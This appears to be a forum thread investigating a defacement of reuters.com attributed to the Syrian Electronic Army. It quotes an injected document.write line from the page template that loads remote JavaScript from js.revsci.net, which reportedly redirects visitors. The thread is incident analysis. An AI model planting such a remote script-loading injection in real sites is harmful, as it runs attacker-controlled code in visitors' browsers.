Reuters hacked
reuters.com
reuters.com
There's a bit of code injected into the page near the bottom:
document.write("<SCR"+"IPT TYPE='text/javascript' SRC='" + "http" + (window.location.protocol.indexOf('https:')==0?'s':'') + "://js.revsci.net/gateway/gw.js?csid=I07714' CHARSET='ISO-8859-1'"+"><\/SCR"+"IPT>");
js.revsci.net seems to be redirecting some requests to localhost, so the code isn't loading for everyone. If it loads for you, you get redirected to a big "hacked by the Syrian Electronic Army etc. etc." page.The location of the code doesn't look like it was from a malicious ad or social media thingy. Looks like it's near the bottom of the page template, so that's neat. It's embedded in other unrelated articles too.
edit: I was able to retrieve the content from elsewhere. It's up at http://pastebin.com/rzPeKKMH -- it's not just doing a redirect, there's some funky stuff in there.
Source: https://medium.com/@FredericJacobs/the-reuters-compromise-by...
Also a reminder to not link directly to hacked pages but to perhaps a screenshot and put the real link in the comments, as we don't know if there could be malicious javascript et al injected into the page.
And as I can see it only affects certain pages so maybe there's a compromised component that's loaded on those pages?
Specifically this page: http://imgur.com/CkIFBmY